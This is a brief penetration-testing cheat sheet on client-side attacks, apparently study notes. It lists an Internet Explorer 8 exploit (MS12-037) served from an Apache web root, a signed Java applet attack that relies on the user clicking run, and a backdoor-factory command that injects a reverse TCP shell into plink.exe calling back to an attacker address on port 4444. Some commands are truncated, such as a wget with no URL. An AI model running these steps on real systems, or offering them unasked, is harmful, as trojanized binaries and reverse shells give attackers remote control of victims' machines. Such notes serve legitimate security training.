Client Attacks
MS12-037- Internet Explorer 8 Fixed Col Span ID
wget -O exploit.html
service apache2 start
JAVA Signed Jar client side attack
echo '' > /var/www/html/java.html
User must hit run on the popup that occurs.
Linux Client Shells
Setting up the Client Side Exploit
Swapping Out the Shellcode
Injecting a Backdoor Shell into Plink.exe
backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip -P 4444 -s reverse_shell_tcp